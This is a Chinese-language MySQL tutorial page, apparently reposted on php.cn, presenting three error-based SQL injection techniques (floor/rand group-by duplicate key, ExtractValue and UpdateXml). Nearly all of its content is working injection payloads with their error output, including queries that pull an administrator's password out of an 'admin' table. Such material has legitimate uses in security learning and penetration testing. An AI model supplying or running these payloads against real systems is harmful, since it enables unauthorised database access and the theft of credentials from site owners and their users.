Community Learn Tools Library Leisure
search
English
Home > Database > Mysql Tutorial > mysql3种报错模式注入_MySQL

mysql3种报错模式注入_MySQL

WBOY
Release: 2016-06-01 13:04:01
Original
966 people have browsed it

1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by...

1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下:
首先进行正常查询:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
| 1 | test | do it |
+----+-------+---------+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
请看 ( http://www.yuefengqing.com/ )
2、ExtractValue
测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3、UpdateXml
测试语句
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));

ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
Related labels:
model
source:php.cn
Previous article:mysql语句中使用like后面的%(百分号)的问题_MySQL Next article:MySql处理数据库和表_MySQL
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
How to display the mobile version of Google Chrome Hello teacher, how can I change Google Chrome into a mobile version?
From 2024-04-23 00:22:19
0
9
1588
Move the content to the left by adding the Width property I have provided margins to the body. main {left margin: 200px; right margin: 200px; text a...
From 2024-04-06 22:01:35
0
3
816
What is the format of the variables in the return value? I am a new learner of php. I found a piece of code: if($x<time()){return[false,'error']...
From 2024-04-06 21:55:20
0
1
778
How to trigger render (with filter and pagination) on sort method in React? Here is my Sort.js style component: <SortWrapper><SortText>SortBy</SortText...
From 2024-04-06 21:28:37
0
1
2257
Regular expression to match words I have a script where I am trying to match new job names with existing job names in a data...
From 2024-04-06 21:24:04
0
1
606
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template